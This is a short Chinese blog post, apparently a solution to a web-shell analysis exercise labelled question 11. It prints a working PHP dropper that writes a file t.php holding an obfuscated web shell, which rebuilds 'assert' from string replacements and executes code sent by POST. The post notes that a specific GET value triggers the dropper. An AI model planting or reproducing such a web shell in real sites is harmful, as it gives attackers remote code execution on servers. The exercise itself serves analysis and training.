WebShell代码分析溯源(第11题)

文件下载下来后这样的
<?php  
if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87')
{$_=@fopen('t.php', 'a');@fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2]));@\$_(\$_POST[1]);?>");@fclose($_);}?>
构造1=GET.fPZ87会生成t.php





posted @ 2020-11-15 15:41  天钧  阅读(118)  评论(0)    收藏  举报